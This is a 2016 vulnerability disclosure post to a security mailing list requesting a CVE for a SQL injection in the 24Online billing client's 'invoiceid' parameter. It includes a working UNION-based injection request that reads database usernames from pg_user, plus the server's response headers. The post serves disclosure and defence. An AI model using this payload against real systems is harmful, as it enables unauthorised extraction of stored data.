Date: Sun, 3 Jul 2016 10:17:29 GMT
From: rahullraz@...il.com
To: bugtraq@...urityfocus.com
Subject: [FD]CVE ID request : SQL injection in 24Online Client

Software name: 24 online
Version: 8.3.6 build 9.0
Vendor website: http://24onlinebilling.com

Potentially others versions older than this are vulnerable too.

Vulnerability type: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The invoiceid GET parameter on <base url>/24online/webpages/myaccount/usersessionsummary.jsp in not filtered properly and leads to SQL Injection

Authentication Required: Yes 

A non-privileged authenticated user can inject SQL commands on the <base-url>/24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=<numeric-id> &fromdt=dd/mm/yyyy hh:mm:ss&todt= dd/mm/yyyy hh:mm:ss

There is complete informational disclosure over the stored database.

-----------------------------------
GET /24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=93043+UNION+ALL+SELECT+null,null,null,null,usename,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pg_user--+-&fromdt=06/05/2016%2019:37:44&todt=03/07/2016%2015:21:16 HTTP/1.1
Host: 10.100.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=5464B4DD2B003E1E73E34FF773CA7232; myaccountmenu_id=menu_5
Connection: keep-alive

HTTP/1.1 200 OK
Date: Sun, 03 Jul 2016 09:59:41 GMT
Server: Apache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1

Powered by blists - more mailing lists